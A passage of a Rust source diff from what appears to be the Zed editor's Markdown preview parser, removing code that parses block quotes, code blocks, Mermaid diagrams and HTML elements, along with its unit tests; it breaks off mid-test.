self.current().unwrap(); - match current { - // This is a nested block quote. - // Record that we're in a nested block quote and continue parsing. - // We don't need to advance the cursor since the next - // call to `parse_block` will handle it. - Event::Start(Tag::BlockQuote(_kind)) => { - nested_depth += 1; - } - Event::End(TagEnd::BlockQuote(_kind)) => { - nested_depth -= 1; - if nested_depth == 0 { - self.cursor += 1; - break; - } - } - _ => {} - }; - } - - ParsedMarkdownBlockQuote { - source_range, - children, - } - } - - async fn parse_code_block( - &mut self, - language: Option, - ) -> Option { - let Some((_event, source_range)) = self.previous() else { - return None; - }; - - let source_range = source_range.clone(); - let mut code = String::new(); - - while !self.eof() { - let Some((current, _source_range)) = self.current() else { - break; - }; - - match current { - Event::Text(text) => { - code.push_str(text); - self.cursor += 1; - } - Event::End(TagEnd::CodeBlock) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - code = code.strip_suffix('\n').unwrap_or(&code).to_string(); - - let highlights = if let Some(language) = &language { - if let Some(registry) = &self.language_registry { - let rope: language::Rope = code.as_str().into(); - registry - .language_for_name_or_extension(language) - .await - .map(|l| l.highlight_text(&rope, 0..code.len())) - .ok() - } else { - None - } - } else { - None - }; - - Some(ParsedMarkdownCodeBlock { - source_range, - contents: code.into(), - language, - highlights, - }) - } - - async fn parse_mermaid_diagram( - &mut self, - scale: Option, - ) -> Option { - let Some((_event, source_range)) = self.previous() else { - return None; - }; - - let source_range = source_range.clone(); - let mut code = String::new(); - - while !self.eof() { - let Some((current, _source_range)) = self.current() else { - break; - }; - - match current { - Event::Text(text) => { - code.push_str(text); - self.cursor += 1; - } - Event::End(TagEnd::CodeBlock) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - code = code.strip_suffix('\n').unwrap_or(&code).to_string(); - - let scale = scale.unwrap_or(100).clamp(10, 500); - - Some(ParsedMarkdownMermaidDiagram { - source_range, - contents: ParsedMarkdownMermaidDiagramContents { - contents: code.into(), - scale, - }, - }) - } - - async fn parse_html_block(&mut self) -> Vec { - let mut elements = Vec::new(); - let Some((_event, _source_range)) = self.previous() else { - return elements; - }; - - let mut html_source_range_start = None; - let mut html_source_range_end = None; - let mut html_buffer = String::new(); - - while !self.eof() { - let Some((current, source_range)) = self.current() else { - break; - }; - let source_range = source_range.clone(); - match current { - Event::Html(html) => { - html_source_range_start.get_or_insert(source_range.start); - html_source_range_end = Some(source_range.end); - html_buffer.push_str(html); - self.cursor += 1; - } - Event::End(TagEnd::CodeBlock) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - let bytes = cleanup_html(&html_buffer); - - let mut cursor = std::io::Cursor::new(bytes); - if let Ok(dom) = parse_document(RcDom::default(), ParseOpts::default()) - .from_utf8() - .read_from(&mut cursor) - && let Some((start, end)) = html_source_range_start.zip(html_source_range_end) - { - self.parse_html_node( - start..end, - &dom.document, - &mut elements, - &ParseHtmlNodeContext::default(), - ); - } - - elements - } - - fn parse_html_node( - &self, - source_range: Range, - node: &Rc, - elements: &mut Vec, - context: &ParseHtmlNodeContext, - ) { - match &node.data { - markup5ever_rcdom::NodeData::Document => { - self.consume_children(source_range, node, elements, context); - } - markup5ever_rcdom::NodeData::Text { contents } => { - elements.push(ParsedMarkdownElement::Paragraph(vec![ - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range, - regions: Vec::default(), - highlights: Vec::default(), - contents: contents.borrow().to_string().into(), - }), - ])); - } - markup5ever_rcdom::NodeData::Comment { .. } => {} - markup5ever_rcdom::NodeData::Element { name, attrs, .. } => { - let mut styles = if let Some(styles) = Self::markdown_style_from_html_styles( - Self::extract_styles_from_attributes(attrs), - ) { - vec![MarkdownHighlight::Style(styles)] - } else { - Vec::default() - }; - - if local_name!("img") == name.local { - if let Some(image) = self.extract_image(source_range, attrs) { - elements.push(ParsedMarkdownElement::Image(image)); - } - } else if local_name!("p") == name.local { - let mut paragraph = MarkdownParagraph::new(); - self.parse_paragraph( - source_range, - node, - &mut paragraph, - &mut styles, - &mut Vec::new(), - ); - - if !paragraph.is_empty() { - elements.push(ParsedMarkdownElement::Paragraph(paragraph)); - } - } else if matches!( - name.local, - local_name!("h1") - | local_name!("h2") - | local_name!("h3") - | local_name!("h4") - | local_name!("h5") - | local_name!("h6") - ) { - let mut paragraph = MarkdownParagraph::new(); - self.consume_paragraph( - source_range.clone(), - node, - &mut paragraph, - &mut styles, - &mut Vec::new(), - ); - - if !paragraph.is_empty() { - elements.push(ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: match name.local { - local_name!("h1") => HeadingLevel::H1, - local_name!("h2") => HeadingLevel::H2, - local_name!("h3") => HeadingLevel::H3, - local_name!("h4") => HeadingLevel::H4, - local_name!("h5") => HeadingLevel::H5, - local_name!("h6") => HeadingLevel::H6, - _ => unreachable!(), - }, - contents: paragraph, - })); - } - } else if local_name!("ul") == name.local || local_name!("ol") == name.local { - if let Some(list_items) = self.extract_html_list( - node, - local_name!("ol") == name.local, - context.list_item_depth, - source_range, - ) { - elements.extend(list_items); - } - } else if local_name!("blockquote") == name.local { - if let Some(blockquote) = self.extract_html_blockquote(node, source_range) { - elements.push(ParsedMarkdownElement::BlockQuote(blockquote)); - } - } else if local_name!("table") == name.local { - if let Some(table) = self.extract_html_table(node, source_range) { - elements.push(ParsedMarkdownElement::Table(table)); - } - } else { - self.consume_children(source_range, node, elements, context); - } - } - _ => {} - } - } - - fn parse_paragraph( - &self, - source_range: Range, - node: &Rc, - paragraph: &mut MarkdownParagraph, - highlights: &mut Vec, - regions: &mut Vec<(Range, ParsedRegion)>, - ) { - fn items_with_range( - range: Range, - items: impl IntoIterator, - ) -> Vec<(Range, T)> { - items - .into_iter() - .map(|item| (range.clone(), item)) - .collect() - } - - match &node.data { - markup5ever_rcdom::NodeData::Text { contents } => { - // append the text to the last chunk, so we can have a hacky version - // of inline text with highlighting - if let Some(text) = paragraph.iter_mut().last().and_then(|p| match p { - MarkdownParagraphChunk::Text(text) => Some(text), - _ => None, - }) { - let mut new_text = text.contents.to_string(); - new_text.push_str(&contents.borrow()); - - text.highlights.extend(items_with_range( - text.contents.len()..new_text.len(), - std::mem::take(highlights), - )); - text.regions.extend(items_with_range( - text.contents.len()..new_text.len(), - std::mem::take(regions) - .into_iter() - .map(|(_, region)| region), - )); - text.contents = SharedString::from(new_text); - } else { - let contents = contents.borrow().to_string(); - paragraph.push(MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range, - highlights: items_with_range(0..contents.len(), std::mem::take(highlights)), - regions: items_with_range( - 0..contents.len(), - std::mem::take(regions) - .into_iter() - .map(|(_, region)| region), - ), - contents: contents.into(), - })); - } - } - markup5ever_rcdom::NodeData::Element { name, attrs, .. } => { - if local_name!("img") == name.local { - if let Some(image) = self.extract_image(source_range, attrs) { - paragraph.push(MarkdownParagraphChunk::Image(image)); - } - } else if local_name!("b") == name.local || local_name!("strong") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("i") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - italic: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("em") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - oblique: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("del") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - strikethrough: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("ins") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - underline: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("a") == name.local { - if let Some(url) = Self::attr_value(attrs, local_name!("href")) - && let Some(link) = - Link::identify(self.file_location_directory.clone(), url) - { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - link: true, - ..Default::default() - })); - - regions.push(( - source_range.clone(), - ParsedRegion { - code: false, - link: Some(link), - }, - )); - } - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else { - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } - } - _ => {} - } - } - - fn consume_paragraph( - &self, - source_range: Range, - node: &Rc, - paragraph: &mut MarkdownParagraph, - highlights: &mut Vec, - regions: &mut Vec<(Range, ParsedRegion)>, - ) { - for node in node.children.borrow().iter() { - self.parse_paragraph(source_range.clone(), node, paragraph, highlights, regions); - } - } - - fn parse_table_row( - &self, - source_range: Range, - node: &Rc, - ) -> Option { - let mut columns = Vec::new(); - - match &node.data { - markup5ever_rcdom::NodeData::Element { name, .. } => { - if local_name!("tr") != name.local { - return None; - } - - for node in node.children.borrow().iter() { - if let Some(column) = self.parse_table_column(source_range.clone(), node) { - columns.push(column); - } - } - } - _ => {} - } - - if columns.is_empty() { - None - } else { - Some(ParsedMarkdownTableRow { columns }) - } - } - - fn parse_table_column( - &self, - source_range: Range, - node: &Rc, - ) -> Option { - match &node.data { - markup5ever_rcdom::NodeData::Element { name, attrs, .. } => { - if !matches!(name.local, local_name!("th") | local_name!("td")) { - return None; - } - - let mut children = MarkdownParagraph::new(); - self.consume_paragraph( - source_range, - node, - &mut children, - &mut Vec::new(), - &mut Vec::new(), - ); - - let is_header = matches!(name.local, local_name!("th")); - - Some(ParsedMarkdownTableColumn { - col_span: std::cmp::max( - Self::attr_value(attrs, local_name!("colspan")) - .and_then(|span| span.parse().ok()) - .unwrap_or(1), - 1, - ), - row_span: std::cmp::max( - Self::attr_value(attrs, local_name!("rowspan")) - .and_then(|span| span.parse().ok()) - .unwrap_or(1), - 1, - ), - is_header, - children, - alignment: Self::attr_value(attrs, local_name!("align")) - .and_then(|align| match align.as_str() { - "left" => Some(ParsedMarkdownTableAlignment::Left), - "center" => Some(ParsedMarkdownTableAlignment::Center), - "right" => Some(ParsedMarkdownTableAlignment::Right), - _ => None, - }) - .unwrap_or_else(|| { - if is_header { - ParsedMarkdownTableAlignment::Center - } else { - ParsedMarkdownTableAlignment::default() - } - }), - }) - } - _ => None, - } - } - - fn consume_children( - &self, - source_range: Range, - node: &Rc, - elements: &mut Vec, - context: &ParseHtmlNodeContext, - ) { - for node in node.children.borrow().iter() { - self.parse_html_node(source_range.clone(), node, elements, context); - } - } - - fn attr_value( - attrs: &RefCell>, - name: html5ever::LocalName, - ) -> Option { - attrs.borrow().iter().find_map(|attr| { - if attr.name.local == name { - Some(attr.value.to_string()) - } else { - None - } - }) - } - - fn markdown_style_from_html_styles( - styles: HashMap, - ) -> Option { - let mut markdown_style = MarkdownHighlightStyle::default(); - - if let Some(text_decoration) = styles.get("text-decoration") { - match text_decoration.to_lowercase().as_str() { - "underline" => { - markdown_style.underline = true; - } - "line-through" => { - markdown_style.strikethrough = true; - } - _ => {} - } - } - - if let Some(font_style) = styles.get("font-style") { - match font_style.to_lowercase().as_str() { - "italic" => { - markdown_style.italic = true; - } - "oblique" => { - markdown_style.oblique = true; - } - _ => {} - } - } - - if let Some(font_weight) = styles.get("font-weight") { - match font_weight.to_lowercase().as_str() { - "bold" => { - markdown_style.weight = FontWeight::BOLD; - } - "lighter" => { - markdown_style.weight = FontWeight::THIN; - } - _ => { - if let Some(weight) = font_weight.parse::().ok() { - markdown_style.weight = FontWeight(weight); - } - } - } - } - - if markdown_style != MarkdownHighlightStyle::default() { - Some(markdown_style) - } else { - None - } - } - - fn extract_styles_from_attributes( - attrs: &RefCell>, - ) -> HashMap { - let mut styles = HashMap::new(); - - if let Some(style) = Self::attr_value(attrs, local_name!("style")) { - for decl in style.split(';') { - let mut parts = decl.splitn(2, ':'); - if let Some((key, value)) = parts.next().zip(parts.next()) { - styles.insert( - key.trim().to_lowercase().to_string(), - value.trim().to_string(), - ); - } - } - } - - styles - } - - fn extract_image( - &self, - source_range: Range, - attrs: &RefCell>, - ) -> Option { - let src = Self::attr_value(attrs, local_name!("src"))?; - - let mut image = Image::identify(src, source_range, self.file_location_directory.clone())?; - - if let Some(alt) = Self::attr_value(attrs, local_name!("alt")) { - image.set_alt_text(alt.into()); - } - - let styles = Self::extract_styles_from_attributes(attrs); - - if let Some(width) = Self::attr_value(attrs, local_name!("width")) - .or_else(|| styles.get("width").cloned()) - .and_then(|width| Self::parse_html_element_dimension(&width)) - { - image.set_width(width); - } - - if let Some(height) = Self::attr_value(attrs, local_name!("height")) - .or_else(|| styles.get("height").cloned()) - .and_then(|height| Self::parse_html_element_dimension(&height)) - { - image.set_height(height); - } - - Some(image) - } - - fn extract_html_list( - &self, - node: &Rc, - ordered: bool, - depth: u16, - source_range: Range, - ) -> Option> { - let mut list_items = Vec::with_capacity(node.children.borrow().len()); - - for (index, node) in node.children.borrow().iter().enumerate() { - match &node.data { - markup5ever_rcdom::NodeData::Element { name, .. } => { - if local_name!("li") != name.local { - continue; - } - - let mut content = Vec::new(); - self.consume_children( - source_range.clone(), - node, - &mut content, - &ParseHtmlNodeContext { - list_item_depth: depth + 1, - }, - ); - - if !content.is_empty() { - list_items.push(ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - depth, - source_range: source_range.clone(), - item_type: if ordered { - ParsedMarkdownListItemType::Ordered(index as u64 + 1) - } else { - ParsedMarkdownListItemType::Unordered - }, - content, - nested: true, - })); - } - } - _ => {} - } - } - - if list_items.is_empty() { - None - } else { - Some(list_items) - } - } - - fn parse_html_element_dimension(value: &str) -> Option { - if value.ends_with("%") { - value - .trim_end_matches("%") - .parse::() - .ok() - .map(|value| relative(value / 100.)) - } else { - value - .trim_end_matches("px") - .parse() - .ok() - .map(|value| px(value).into()) - } - } - - fn extract_html_blockquote( - &self, - node: &Rc, - source_range: Range, - ) -> Option { - let mut children = Vec::new(); - self.consume_children( - source_range.clone(), - node, - &mut children, - &ParseHtmlNodeContext::default(), - ); - - if children.is_empty() { - None - } else { - Some(ParsedMarkdownBlockQuote { - children, - source_range, - }) - } - } - - fn extract_html_table( - &self, - node: &Rc, - source_range: Range, - ) -> Option { - let mut header_rows = Vec::new(); - let mut body_rows = Vec::new(); - let mut caption = None; - - // node should be a thead, tbody or caption element - for node in node.children.borrow().iter() { - match &node.data { - markup5ever_rcdom::NodeData::Element { name, .. } => { - if local_name!("caption") == name.local { - let mut paragraph = MarkdownParagraph::new(); - self.parse_paragraph( - source_range.clone(), - node, - &mut paragraph, - &mut Vec::new(), - &mut Vec::new(), - ); - caption = Some(paragraph); - } - if local_name!("thead") == name.local { - // node should be a tr element - for node in node.children.borrow().iter() { - if let Some(row) = self.parse_table_row(source_range.clone(), node) { - header_rows.push(row); - } - } - } else if local_name!("tbody") == name.local { - // node should be a tr element - for node in node.children.borrow().iter() { - if let Some(row) = self.parse_table_row(source_range.clone(), node) { - body_rows.push(row); - } - } - } - } - _ => {} - } - } - - if !header_rows.is_empty() || !body_rows.is_empty() { - Some(ParsedMarkdownTable { - source_range, - body: body_rows, - header: header_rows, - caption, - }) - } else { - None - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use ParsedMarkdownListItemType::*; - use core::panic; - use gpui::{AbsoluteLength, BackgroundExecutor, DefiniteLength}; - use language::{HighlightId, LanguageRegistry}; - use pretty_assertions::assert_eq; - - async fn parse(input: &str) -> ParsedMarkdown { - parse_markdown(input, None, None).await - } - - #[gpui::test] - async fn test_headings() { - let parsed = parse("# Heading one\n## Heading two\n### Heading three").await; - - assert_eq!( - parsed.children, - vec![ - h1(text("Heading one", 2..13), 0..14), - h2(text("Heading two", 17..28), 14..29), - h3(text("Heading three", 33..46), 29..46), - ] - ); - } - - #[gpui::test] - async fn test_newlines_dont_new_paragraphs() { - let parsed = parse("Some text **that is bolded**\n and *italicized*").await; - - assert_eq!( - parsed.children, - vec![p("Some text that is bolded and italicized", 0..46)] - ); - } - - #[gpui::test] - async fn test_heading_with_paragraph() { - let parsed = parse("# Zed\nThe editor").await; - - assert_eq!( - parsed.children, - vec![h1(text("Zed", 2..5), 0..6), p("The editor", 6..16),] - ); - } - - #[gpui::test] - async fn test_double_newlines_do_new_paragraphs() { - let parsed = parse("Some text **that is bolded**\n\n and *italicized*").await; - - assert_eq!( - parsed.children, - vec![ - p("Some text that is bolded", 0..29), - p("and italicized", 31..47), - ] - ); - } - - #[gpui::test] - async fn test_bold_italic_text() { - let parsed = parse("Some text **that is bolded** and *italicized*").await; - - assert_eq!( - parsed.children, - vec![p("Some text that is bolded and italicized", 0..45)] - ); - } - - #[gpui::test] - async fn test_nested_bold_strikethrough_text() { - let parsed = parse("Some **bo~~strikethrough~~ld** text").await; - - assert_eq!(parsed.children.len(), 1); - assert_eq!( - parsed.children[0], - ParsedMarkdownElement::Paragraph(vec![MarkdownParagraphChunk::Text( - ParsedMarkdownText { - source_range: 0..35, - contents: "Some bostrikethroughld text".into(), - highlights: Vec::new(), - regions: Vec::new(), - } - )]) - ); - - let new_text = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - - let paragraph = if let MarkdownParagraphChunk::Text(text) = &new_text[0] { - text - } else { - panic!("Expected a text"); - }; - - assert_eq!( - paragraph.highlights, - vec![ - ( - 5..7, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - ..Default::default() - }), - ), - ( - 7..20, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - strikethrough: true, - ..Default::default() - }), - ), - ( - 20..22, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - ..Default::default() - }), - ), - ] - ); - } - - #[gpui::test] - async fn test_html_inline_style_elements() { - let parsed = - parse("

Some text strong text more text bold text more text italic text more text emphasized text more text deleted text more text inserted text

").await; - - assert_eq!(1, parsed.children.len()); - let chunks = if let ParsedMarkdownElement::Paragraph(chunks) = &parsed.children[0] { - chunks - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(1, chunks.len()); - let text = if let MarkdownParagraphChunk::Text(text) = &chunks[0] { - text - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(0..205, text.source_range); - assert_eq!( - "Some text strong text more text bold text more text italic text more text emphasized text more text deleted text more text inserted text", - text.contents.as_str(), - ); - assert_eq!( - vec![ - ( - 10..21, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight(700.0), - ..Default::default() - },), - ), - ( - 32..41, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight(700.0), - ..Default::default() - },), - ), - ( - 52..63, - MarkdownHighlight::Style(MarkdownHighlightStyle { - italic: true, - weight: FontWeight(400.0), - ..Default::default() - },), - ), - ( - 74..89, - MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight(400.0), - oblique: true, - ..Default::default() - },), - ), - ( - 100..112, - MarkdownHighlight::Style(MarkdownHighlightStyle { - strikethrough: true, - weight: FontWeight(400.0), - ..Default::default() - },), - ), - ( - 123..136, - MarkdownHighlight::Style(MarkdownHighlightStyle { - underline: true, - weight: FontWeight(400.0,), - ..Default::default() - },), - ), - ], - text.highlights - ); - } - - #[gpui::test] - async fn test_html_href_element() { - let parsed = - parse("

Some text link more text

").await; - - assert_eq!(1, parsed.children.len()); - let chunks = if let ParsedMarkdownElement::Paragraph(chunks) = &parsed.children[0] { - chunks - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(1, chunks.len()); - let text = if let MarkdownParagraphChunk::Text(text) = &chunks[0] { - text - } else { - panic!("Expected a paragraph"); - }; - - assert_eq!(0..65, text.source_range); - assert_eq!("Some text link more text", text.contents.as_str(),); - assert_eq!( - vec![( - 10..14, - MarkdownHighlight::Style(MarkdownHighlightStyle { - link: true, - ..Default::default() - },), - )], - text.highlights - ); - assert_eq!( - vec![( - 10..14, - ParsedRegion { - code: false, - link: Some(Link::Web { - url: "https://example.com".into() - }) - } - )], - text.regions - ) - } - - #[gpui::test] - async fn test_text_with_inline_html() { - let parsed = parse("This is a paragraph with an inline HTML tag.").await; - - assert_eq!( - parsed.children, - vec![p("This is a paragraph with an inline HTML tag.", 0..63),], - ); - } - - #[gpui::test] - async fn test_raw_links_detection() { - let parsed = parse("Checkout this https://zed.dev link").await; - - assert_eq!( - parsed.children, - vec![p("Checkout this https://zed.dev link", 0..34)] - ); - } - - #[gpui::test] - async fn test_empty_image() { - let parsed = parse("![]()").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!(paragraph.len(), 0); - } - - #[gpui::test] - async fn test_image_links_detection() { - let parsed = parse("![test](https://blog.logrocket.com/wp-content/uploads/2024/04/exploring-zed-open-source-code-editor-rust-2.png)").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - paragraph[0], - MarkdownParagraphChunk::Image(Image { - source_range: 0..111, - link: Link::Web { - url: "https://blog.logrocket.com/wp-content/uploads/2024/04/exploring-zed-open-source-code-editor-rust-2.png".to_string(), - }, - alt_text: Some("test".into()), - height: None, - width: None, - },) - ); - } - - #[gpui::test] - async fn test_image_alt_text() { - let parsed = parse("[![Zed](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/zed-industries/zed/main/assets/badge/v0.json)](https://zed.dev)\n ").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - paragraph[0], - MarkdownParagraphChunk::Image(Image { - source_range: 0..142, - link: Link::Web { - url: "https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/zed-industries/zed/main/assets/badge/v0.json".to_string(), - }, - alt_text: Some("Zed".into()), - height: None, - width: None, - },) - ); - } - - #[gpui::test] - async fn test_image_without_alt_text() { - let parsed = parse("![](http://example.com/foo.png)").await; - - let paragraph = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - paragraph[0], - MarkdownParagraphChunk::Image(Image { - source_range: 0..31, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: None, - width: None, - },) - ); - } - - #[gpui::test] - async fn test_image_with_alt_text_containing_formatting() { - let parsed = parse("![foo *bar* baz](http://example.com/foo.png)").await; - - let ParsedMarkdownElement::Paragraph(chunks) = &parsed.children[0] else { - panic!("Expected a paragraph"); - }; - assert_eq!( - chunks, - &[MarkdownParagraphChunk::Image(Image { - source_range: 0..44, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: Some("foo bar baz".into()), - height: None, - width: None, - }),], - ); - } - - #[gpui::test] - async fn test_images_with_text_in_between() { - let parsed = parse( - "![foo](http://example.com/foo.png)\nLorem Ipsum\n![bar](http://example.com/bar.png)", - ) - .await; - - let chunks = if let ParsedMarkdownElement::Paragraph(text) = &parsed.children[0] { - text - } else { - panic!("Expected a paragraph"); - }; - assert_eq!( - chunks, - &vec![ - MarkdownParagraphChunk::Image(Image { - source_range: 0..81, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: Some("foo".into()), - height: None, - width: None, - }), - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..81, - contents: " Lorem Ipsum ".into(), - highlights: Vec::new(), - regions: Vec::new(), - }), - MarkdownParagraphChunk::Image(Image { - source_range: 0..81, - link: Link::Web { - url: "http://example.com/bar.png".to_string(), - }, - alt_text: Some("bar".into()), - height: None, - width: None, - }) - ] - ); - } - - #[test] - fn test_parse_html_element_dimension() { - // Test percentage values - assert_eq!( - MarkdownParser::parse_html_element_dimension("50%"), - Some(DefiniteLength::Fraction(0.5)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("100%"), - Some(DefiniteLength::Fraction(1.0)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("25%"), - Some(DefiniteLength::Fraction(0.25)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("0%"), - Some(DefiniteLength::Fraction(0.0)) - ); - - // Test pixel values - assert_eq!( - MarkdownParser::parse_html_element_dimension("100px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.0)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("50px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(50.0)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("0px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(0.0)))) - ); - - // Test values without units (should be treated as pixels) - assert_eq!( - MarkdownParser::parse_html_element_dimension("100"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.0)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("42"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(42.0)))) - ); - - // Test invalid values - assert_eq!( - MarkdownParser::parse_html_element_dimension("invalid"), - None - ); - assert_eq!(MarkdownParser::parse_html_element_dimension("px"), None); - assert_eq!(MarkdownParser::parse_html_element_dimension("%"), None); - assert_eq!(MarkdownParser::parse_html_element_dimension(""), None); - assert_eq!(MarkdownParser::parse_html_element_dimension("abc%"), None); - assert_eq!(MarkdownParser::parse_html_element_dimension("abcpx"), None); - - // Test decimal values - assert_eq!( - MarkdownParser::parse_html_element_dimension("50.5%"), - Some(DefiniteLength::Fraction(0.505)) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("100.25px"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(100.25)))) - ); - assert_eq!( - MarkdownParser::parse_html_element_dimension("42.0"), - Some(DefiniteLength::Absolute(AbsoluteLength::Pixels(px(42.0)))) - ); - } - - #[gpui::test] - async fn test_html_unordered_list() { - let parsed = parse( - "
    -
  • Item 1
  • -
  • Item 2
  • -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..82))] - ), - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Item 2", 0..82))] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_ordered_list() { - let parsed = parse( - "
    -
  1. Item 1
  2. -
  3. Item 2
  4. -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Ordered(1), - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..82))] - ), - nested_list_item( - 0..82, - 1, - ParsedMarkdownListItemType::Ordered(2), - vec![ParsedMarkdownElement::Paragraph(text("Item 2", 0..82))] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_nested_ordered_list() { - let parsed = parse( - "
    -
  1. Item 1
  2. -
  3. Item 2 -
      -
    1. Sub-Item 1
    2. -
    3. Sub-Item 2
    4. -
    -
  4. -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Ordered(1), - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Ordered(2), - vec![ - ParsedMarkdownElement::Paragraph(text("Item 2", 0..216)), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Ordered(1), - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Ordered(2), - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 2", 0..216))] - ), - ] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_nested_unordered_list() { - let parsed = parse( - "
    -
  • Item 1
  • -
  • Item 2 -
      -
    • Sub-Item 1
    • -
    • Sub-Item 2
    • -
    -
  • -
", - ) - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 1, - ParsedMarkdownListItemType::Unordered, - vec![ - ParsedMarkdownElement::Paragraph(text("Item 2", 0..216)), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 1", 0..216))] - ), - nested_list_item( - 0..216, - 2, - ParsedMarkdownListItemType::Unordered, - vec![ParsedMarkdownElement::Paragraph(text("Sub-Item 2", 0..216))] - ), - ] - ), - ] - }, - parsed - ); - } - - #[gpui::test] - async fn test_inline_html_image_tag() { - let parsed = - parse("

Some text some more text

") - .await; - - assert_eq!( - ParsedMarkdown { - children: vec![ParsedMarkdownElement::Paragraph(vec![ - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..71, - contents: "Some text".into(), - highlights: Default::default(), - regions: Default::default() - }), - MarkdownParagraphChunk::Image(Image { - source_range: 0..71, - link: Link::Web { - url: "http://example.com/foo.png".to_string(), - }, - alt_text: None, - height: None, - width: None, - }), - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..71, - contents: " some more text".into(), - highlights: Default::default(), - regions: Default::default() - }), - ])] - }, - parsed - ); - } - - #[gpui::test] - async fn test_html_block_quote() { - let parsed = parse( - "
-

some description

-
